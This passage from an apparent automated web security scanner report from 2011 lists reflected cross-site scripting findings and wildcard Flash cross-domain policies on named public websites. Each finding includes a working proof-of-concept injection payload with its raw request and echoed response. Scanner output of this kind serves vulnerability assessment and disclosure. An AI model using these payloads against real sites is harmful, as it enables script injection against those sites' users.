GET /favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:58:33 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:58:33 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f" />
...[SNIP]...

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b99b"><script>alert(1)</script>ca9c0d3513d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749251; expires=Sun, 01-Apr-2012 14:00:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:00:51 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d - ">
...[SNIP]...

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1d63'%3ba353fa99bdc was submitted in the REST URL parameter 1. This input was echoed as f1d63';a353fa99bdc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /f1d63'%3ba353fa99bdc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/f1d63';a353fa99bdc/index.html
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 13:41:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:41:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3579

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/f1d63';a353fa99bdc/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="po
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/f1d63';a353fa99bdc/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 was submitted in the REST URL parameter 1. This input was echoed as 49add"style="x:expression(alert(1))"0c2a6539db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmcz
...[SNIP]...
<A HREF="http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2">
...[SNIP]...

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3a1<script>alert(1)</script>1f3e33e8e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmcz
...[SNIP]...
res=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f694<script>alert(1)</script>3af9c4679e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 757

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c6c"><script>alert(1)</script>c18b021cdc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
...[SNIP]...

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a1e2><script>alert(1)</script>0856dee6b4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9fa44><script>alert(1)</script>ab167bca6cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd1a5"><script>alert(1)</script>df47f8a83f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
...[SNIP]...

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3412a<script>alert(1)</script>af689436fa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3412a<script>alert(1)</script>af689436fa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 249

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1">http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1</a>
...[SNIP]...

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39dc7"><script>alert(1)</script>63b1fa46103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1">http://townhall.com/favicon.ico?39dc7"><sc
...[SNIP]...

7. Flash cross-domain policy
There are 550 instances of this issue:


7.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:31:36 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 37531
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.3. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 11:30:43 GMT
Expires: Thu, 31 Mar 2011 11:30:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5168
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.4. http://smp.adviva.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 17 Nov 2009 11:38:46 GMT
ETag: "c20ce1-110-4788f91a4dd80"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.5. http://www.43things.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 May 2005 21:41:11 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.6. http://www.about.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.about.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

